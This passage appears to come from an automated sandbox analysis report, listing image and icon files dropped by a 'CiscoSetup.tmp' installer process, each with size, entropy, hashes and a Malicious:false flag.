                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):1601
Entropy (8bit):6.020486157649533
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
Category:dropped
Size (bytes):5494
Entropy (8bit):1.0468421318534369
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):388
Entropy (8bit):7.139959170245274
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
Category:dropped
Size (bytes):5430
Entropy (8bit):3.4732129504366194
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
Category:dropped
Size (bytes):3884
Entropy (8bit):6.749338244156901
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
Category:dropped
Size (bytes):83426
Entropy (8bit):7.358868361468608
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
Category:dropped
Size (bytes):10710
Entropy (8bit):7.9641316394298025
Encrypted:false
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
Category:dropped
Size (bytes):3881
Entropy (8bit):6.749191813135782
Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
